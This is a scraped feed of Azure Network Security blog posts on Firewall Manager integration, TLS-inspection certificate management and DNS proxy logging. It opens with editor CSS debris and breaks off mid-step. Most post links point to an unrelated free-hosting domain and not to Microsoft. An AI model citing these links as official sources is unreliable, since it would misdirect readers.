-webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> Fri, 16 Apr 2021 15:35:56 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-for-azure-firewall-in-azure-sentinel/ba-p/2244958 Mohit_Kumar 2021-04-16T15:35:56Z Azure Firewall Manager Is Now Integrated with Azure Security Center https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-firewall-manager-is-now-integrated-with-azure-security/ba-p/2228679 <P>&nbsp;</P> <P>Written in collaboration with&nbsp;<LI-USER uid="124214"></LI-USER>&nbsp;<SPAN>(Principal PM CxE Azure Security Center Team)</SPAN></P> <H2>&nbsp;</H2> <H2>Introduction</H2> <P>Azure Security Center is a unified infrastructure security management system that strengthens the security posture of your data centers, and provides advanced threat protection across your hybrid workloads in the cloud - whether they're in Azure or not - as well as on premises.&nbsp; Azure Firewall Manager is a security management service that provides central security policy and route management for cloud-based security perimeters.&nbsp; To provide unified infrastructure and network security management to you, we have now integrated Azure Firewall Manager with the Azure Security Center.</P> <H2>&nbsp;</H2> <H2>Key Benefit</H2> <P>With the integration of Azure Firewall Manager with Azure Security Center, customers will now have a single pane of glass view of their infrastructure and network security.&nbsp; Customers will be able to see the status of Network Security from the Azure Security Center directly.&nbsp; Customers will no longer have to go into 2 different blades: in ASC for infrastructure security and in Firewall Manager for Network Security.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1616457222819.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/266190iE90C7DE18D74A3DE/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1616457222819.png" alt="Mohit_Kumar_1-1616457222819.png" /></span></P> <P>&nbsp;</P> <P>To learn more about this integration, visit the Azure Security Center blog – <A title="Azure Network Security Visibility and Control using ASC integration with Azure Firewall Manager" href="https://gorovian.000webhostapp.com/?exam=t5/azure-security-center/azure-network-security-visibility-and-control-using-asc/ba-p/2228222?emcs_t=S2h8ZW1haWx8bWVudGlvbl9zdWJzY3JpcHRpb258S01LWjVaWjZBU0Y5RjV8MjIyODIyMnxBVF9NRU5USU9OU3xoSw" target="_blank" rel="noopener">Azure Network Security Visibility and Control using ASC integration with Azure Firewall Manager</A></P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <H2>Additional Resources</H2> <UL> <LI>To learn more about Azure Firewall Manager, visit: <A title="What is Azure Firewall Manager?" href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/firewall-manager</A></LI> <LI>To learn more about Azure Security Center, visit: <A title="Become an Azure Security Center Ninja" href="#" target="_blank" rel="noopener">https://aka.ms/ascninja</A></LI> <LI>Watch a demonstration of Azure Security Center integration with Azure Firewall Manager in <A title=" Azure Security Center in the Field - Out of Band" href="#" target="_blank" rel="noopener">this episode of Azure Security Center in the Field – Out of Band Edition</A></LI> </UL> <H2>&nbsp;</H2> Tue, 23 Mar 2021 00:53:56 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-firewall-manager-is-now-integrated-with-azure-security/ba-p/2228679 Mohit_Kumar 2021-03-23T00:53:56Z Certificate Management Overview for Azure Firewall Premium TLS Inspection https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/certificate-management-overview-for-azure-firewall-premium-tls/ba-p/2214763 <P>Azure Firewall Premium, which <A href="#" target="_blank" rel="noopener">entered Public Preview on February 16<SUP>th</SUP></A>, introduces some important <A href="#" target="_blank" rel="noopener">new security features</A>, including IDPS, TLS termination, and more powerful application rules that now handle full URLs and categories. This blog will focus on TLS termination, and more specifically how to deal with the complexities of certificate management.</P> <P>&nbsp;</P> <P>There is an overview of the TLS certificates used by clients, websites, and Azure Firewall in a typical web request that is subject to TLS termination <A href="#" target="_blank" rel="noopener">in our documentation</A> (diagram below). In summary, a Subordinate (Intermediate) CA certificate needs to be imported to a Key Vault for Azure Firewall to use. To ensure a seamless experience for clients, they all must trust the certificate issued by Azure Firewall.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_0-1615918522682.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/264481i31AAB06F65A2D857/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_0-1615918522682.png" alt="Anthony_Roman_0-1615918522682.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>The rough steps for enabling TLS Inspection are:</P> <UL> <LI>Issue and export a subordinate, or intermediate, CA certificate along with its private key.</LI> <LI>Save the certificate and key in a <A href="#" target="_blank" rel="noopener">Key Vault</A>.</LI> <LI>Create a Managed Identity for Firewall to use and allow it to access the Key Vault.</LI> <LI><A href="#" target="_blank" rel="noopener">Configure your Firewall Policy</A> for TLS Inspection.</LI> <LI>Ensure that clients trust the certificate that will be presented by Azure Firewall.</LI> </UL> <P>&nbsp;</P> <P>&nbsp;The rest of the blog will walk through the different ways to accomplish steps 1 and 5.</P> <P>&nbsp;</P> <P>&nbsp;There is also a <A href="#" target="_self">webinar recording on YouTube</A> with similar information and live demonstrations.</P> <P>&nbsp;</P> <H2>General Certificate Requirements</H2> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">From our docs</A>, the certificate issued must conform to the following:</P> <UL> <LI>It must be a single certificate, and shouldn’t include the entire chain of certificates.</LI> <LI>It must be valid for one year forward.</LI> <LI>It must be an RSA private key with minimal size of 4096 bytes.</LI> <LI>It must have the&nbsp;KeyUsage&nbsp;extension marked as Critical with the&nbsp;KeyCertSign&nbsp;flag (RFC 5280; 4.2.1.3 Key Usage).</LI> <LI>It must have the&nbsp;BasicContraints&nbsp;extension marked as Critical (RFC 5280; 4.2.1.9 Basic Constraints).</LI> <LI>The&nbsp;CA&nbsp;flag must be set to TRUE.</LI> <LI>The Path Length must be greater than or equal to one.</LI> </UL> <P>&nbsp;</P> <P>These requirements can be fulfilled by either generating self-signed certificates on any server, or by using an existing Certificate Authority, possibly as part of a Public Key Infrastructure (PKI). Public Certificate Authorities will not issue a certificate of this type because it will be used to issue other certificates on behalf of the root or issuing CA. Since most public CAs are trusted by default on client operating systems, allowing others to issue certificates on behalf of those would be a major security risk.</P> <P>&nbsp;</P> <H2>Self-Signed Certificates</H2> <P>&nbsp;</P> <P>The quickest and easiest method of generating a certificate for use on Azure Firewall is to generate root and subordinate CA certs on any Windows, Linux, or MacOS machine using openssl. This is the recommended method to use for testing environments, due to its simplicity.</P> <P>&nbsp;</P> <P>There are <A href="#" target="_blank" rel="noopener">scripts in our documentation</A> that make this process very easy. If you are using these certificates in a production environment, be sure to secure the root CA certificate by storing it in a Key Vault.</P> <P>&nbsp;</P> <H2>Establishing Trust</H2> <P>&nbsp;</P> <P>If the certificate used on Azure Firewall is not trusted by the client making a web request, they will be met with an error, which would disrupt normal operations. The best way to establish trust is to add the Root CA that issued the Firewall certificate as a Trusted Root CA on every client device that will be sending traffic through the Firewall. You will need an exported .cer file from your Root CA.</P> <P>&nbsp;</P> <P>Using Ubuntu as the example for Linux, this can be done using <A href="#" target="_blank" rel="noopener">update-ca-certificates</A>.</P> <P>&nbsp;</P> <P>On Windows, you can use the UI or import using <A href="#" target="_blank" rel="noopener">Powershell</A>.</P> <P>&nbsp;</P> <P>This process can be scripted and run remotely if the environment allows it.</P> <P>&nbsp;</P> <H2>PKI</H2> <P>&nbsp;</P> <P>A Public Key Infrastructure can be used by organizations to manage trust within an enterprise. There are several advantages to using this approach rather than self-signed certificates, including:</P> <UL> <LI>CA infrastructure may already be in place in some environments, especially hybrid ones.</LI> <LI>Enterprise Root CA is automatically trusted by all domain-joined Windows computers. No extra steps are needed to establish trust.</LI> <LI>Certificate rotation and revocation can be done centrally via Group Policy, so changes are more easily managed.</LI> </UL> <P>&nbsp;</P> <P>Using PKI, you will not have to import your certificate on your Windows clients, since they will all automatically trust your Enterprise Root CA. The full process of generating, exporting, and configuring Azure Firewall to use a PKI certificate is <A href="#" target="_blank" rel="noopener">documented in a new article here</A>.</P> <P>&nbsp;</P> <H2>Intune</H2> <P>&nbsp;</P> <P>Intune does not generate certificates, but it can be a great tool to manage them on clients. If your Azure VMs are managed by Intune, you can use <A href="#" target="_blank" rel="noopener">certificate profiles</A> to add your chosen CA as trusted.</P> <P>&nbsp;</P> <H2>Custom Images</H2> <P>&nbsp;</P> <P>If your environment is not connected to or managed by Active Directory, Intune, MEM, or any other client management tool, you still have an option to deploy certificates at scale. <A href="#" target="_blank" rel="noopener">Using custom images</A>, you can install the trusted Root CA certificate, capture an image, and use that image to deploy or re-deploy your VM instances.</P> <P>&nbsp;</P> <P>This process works best in environments where servers are treated as “cattle” rather than “pets,” meaning that they are spun up and down often and automatically configured, rather than manually configured and maintained for long periods of time.</P> <P>&nbsp;</P> <H2>Summary</H2> <P>&nbsp;</P> <P>This has been an overview of some different methods available to create certificates for use on Azure Firewall Premium and establish trust for those certificates on your clients. This is certainly not an exhaustive list of the options out there, so we would like to hear more from you. Please leave a comment telling us what methods you are currently using or would like to use. We will use your feedback to create more documentation and other instructional content.</P> Tue, 31 Aug 2021 21:23:24 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/certificate-management-overview-for-azure-firewall-premium-tls/ba-p/2214763 Anthony_Roman 2021-08-31T21:23:24Z Enabling Central Visibility For DNS Using Azure Firewall Custom DNS and DNS Proxy https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/enabling-central-visibility-for-dns-using-azure-firewall-custom/ba-p/2156331 <P>Many of our customers use Azure DNS for name resolution when it comes to infrastructure they have in Azure. The setup with Azure DNS works like a charm and provides name resolution to Azure Infrastructure without doing any complex setup. One challenge you may have is that Azure DNS do not log DNS queries from your VM’s, which means you have no visibility into what endpoints their azure infrastructure is trying to connect to or the DNS name resolution queries being used.</P> <P>&nbsp;</P> <P>In this blog, we will see how Azure Firewall can help our customers overcome this challenge and provide visibility not only to Azure DNS logging but also to control the traffic flows both east-west and to the internet for their Azure resources.</P> <P>&nbsp;</P> <P>Azure Firewall recently added Custom DNS and DNS proxy capabilities which was a big ask from all of our customers and, these are the features which we will explore in this blog and how it can help you.</P> <P>&nbsp;</P> <H2><FONT color="#003366">Azure DNS</FONT></H2> <P>&nbsp;</P> <P>Azure DNS provides name resolution and basic authoritative DNS capabilities of public DNS names. The Azure DNS IP address is 168.63.129.16. Azure DNS provides DNS name resolution for your Azure infrastructure if you do not have your own DNS server hosted. For example, when you setup a new VM in Azure, it can resolve the public names out of the box using Azure provided name resolution (Azure DNS).</P> <P>&nbsp;</P> <H2>Azure Firewall Custom DNS</H2> <P>By Default, Azure Firewall uses Azure DNS to ensure the service can reliably resolve internet based name resolution. Custom DNS allows you to configure Azure Firewall to use your own corporate DNS server or Azure DNS to resolve the DNS queries.</P> <P>You may configure a single DNS server or multiple servers in Azure Firewall and Firewall Policy DNS settings. We will go through the setup in more detail later on in this blog.</P> <P>&nbsp;</P> <H2>Azure Firewall DNS Proxy</H2> <P>This feature enables Azure Firewall to act as a DNS forwarder for your Infrastructure. When DNS proxy is enabled, your clients can point to Azure Firewall to resolve the DNS queries and act as DNS servers for your infrastructure.</P> <P>DNS Proxy logs all the queries coming from your infrastructure in Azure Firewall logs, and we will go through the logs in detail later on in this blog.</P> <P>We hope the above gives you a good understanding of the components involved in the challenge we are trying to resolve. Let’s look at the solution now and see how Azure firewall Custom DNS and DNS proxy will help with getting visibility into Azure DNS logging.</P> <P>&nbsp;</P> <H2>Architecture</H2> <P>The problem we are trying to solve in this blog is even when UDR’s force all traffic to Firewall, DNS traffic goes straight to DNS which means you cannot log the DNS traffic or control the traffic flow going from your infrastructure to Azure DNS. With this architecture, you can centrally log all DNS traffic going to Azure DNS using Azure Firewall.</P> <P>&nbsp;</P> <P>In this architecture/deployment we will use a&nbsp;<A href="#" target="_blank" rel="noopener">hub and spoke model</A>&nbsp;is recommended, where the firewall is in its own Virtual Network. For the purpose of the blog we will assume a simple architecture where both Workload VM and Azure Firewall is in the same Virtual network but deployed in two different subnets as represented in the below Diagram.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-300px"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Ashish_Kapila_6-1614014094878.png" style="width: 224px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/256537i5CE368300829C3AB/image-dimensions/224x309?v=v2" width="224" height="309" role="button" title="Ashish_Kapila_6-1614014094878.png" alt="Ashish_Kapila_6-1614014094878.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Azure Firewall Deployment</H2> <P>You can deploy azure firewall either from Azure Portal, ARM, REST or CLI. Here is the article which you can follow to setup the above configuration step by step using azure portal.</P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Tutorial: Deploy &amp; configure Azure Firewall using the Azure portal | Microsoft Docs</A></P> <P>&nbsp;</P> <P>From the above article, you only need to follow the first five steps</P> <P>&nbsp;</P> <OL> <LI><A href="#" target="_blank" rel="noopener">Prerequisites</A></LI> <LI><A href="#" target="_blank" rel="noopener">Set up the network</A></LI> <LI><A href="#" target="_blank" rel="noopener">Deploy the firewall</A></LI> <LI><A href="#" target="_blank" rel="noopener">Create a default route</A></LI> <LI><A href="#" target="_blank" rel="noopener">Configure an application rule</A></LI> <LI><A href="#" target="_blank" rel="noopener">Configure a DNAT rule</A></LI> </OL> <P>Once you have followed the above steps, you have an Azure Firewall and you can connect to your workload VM using the Azure Firewall Public IP.</P> <P>&nbsp;</P> <H2><FONT color="#003366">Custom DNS and DNS Proxy Configuration</FONT></H2> <P>&nbsp;</P> <P>We will now configure Custom DNS and DNS proxy in Azure Firewall.</P> <P>&nbsp;</P> <P><EM>Configure custom DNS servers and DNS Proxy - Azure portal</EM></P> <OL> <LI>Under Azure Firewall&nbsp;<STRONG>Settings</STRONG>, select&nbsp;<STRONG>DNS Settings</STRONG>.</LI> <LI>Under&nbsp;<STRONG>DNS servers</STRONG>, Select <STRONG>Default (Azure provided)</STRONG>.</LI> <LI>Under <STRONG>DNS Proxy</STRONG>, Select <STRONG>Enabled</STRONG></LI> <LI>Select&nbsp;<STRONG>Save</STRONG>.</LI> </OL> <P class="lia-indent-padding-left-60px">&nbsp;<span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Ashish_Kapila_7-1614014094891.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/256539i4BD0856D7891189B/image-size/large?v=v2&amp;px=999" role="button" title="Ashish_Kapila_7-1614014094891.png" alt="Ashish_Kapila_7-1614014094891.png" /></span></P> <P>&nbsp;</P> <P>Now the Azure firewall directs DNS traffic to Azure DNS for name resolution and Azure Firewall is configured as a DNS proxy.</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-330px"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Ashish_Kapila_8-1614014094892.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/256538iF0388DA036B66A83/image-size/large?v=v2&amp;px=999" role="button" title="Ashish_Kapila_8-1614014094892.png" alt="Ashish_Kapila_8-1614014094892.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Enable Diagnostic logs for Azure Firewall</H2> <P>&nbsp;</P> <OL> <LI>In the Azure portal, Select the Azure firewall.</LI> <LI>Under&nbsp;<STRONG>Monitoring</STRONG>, select&nbsp;<STRONG>Diagnostic settings</STRONG>.</LI> </OL> <P>&nbsp;</P> <P><EM>For Azure Firewall, four service-specific logs are available:</EM></P> <UL> <LI>AzureFirewallApplicationRule</LI> <LI>AzureFirewallNetworkRule</LI> <LI>AzureFirewallThreatIntelLog</LI> <LI>AzureFirewallDnsProxy</LI> </UL> <P>&nbsp;</P> <OL start="3"> <LI>Select&nbsp;<STRONG>Add diagnostic setting</STRONG>. The&nbsp;<STRONG>Diagnostics settings</STRONG>&nbsp;page provides the settings for the diagnostic logs.</LI> <LI>In this example, Azure Monitor logs stores the logs, so type&nbsp;<STRONG>Firewall log analytics</STRONG>&nbsp;for the name.</LI> <LI>Under&nbsp;<STRONG>Log</STRONG>, select&nbsp;<STRONG>AzureFirewallApplicationRule</STRONG>,&nbsp;<STRONG>AzureFirewallNetworkRule</STRONG>,&nbsp;<STRONG>AzureFirewallThreatIntelLog</STRONG>, and&nbsp;<STRONG>AzureFirewallDnsProxy</STRONG>&nbsp;to collect 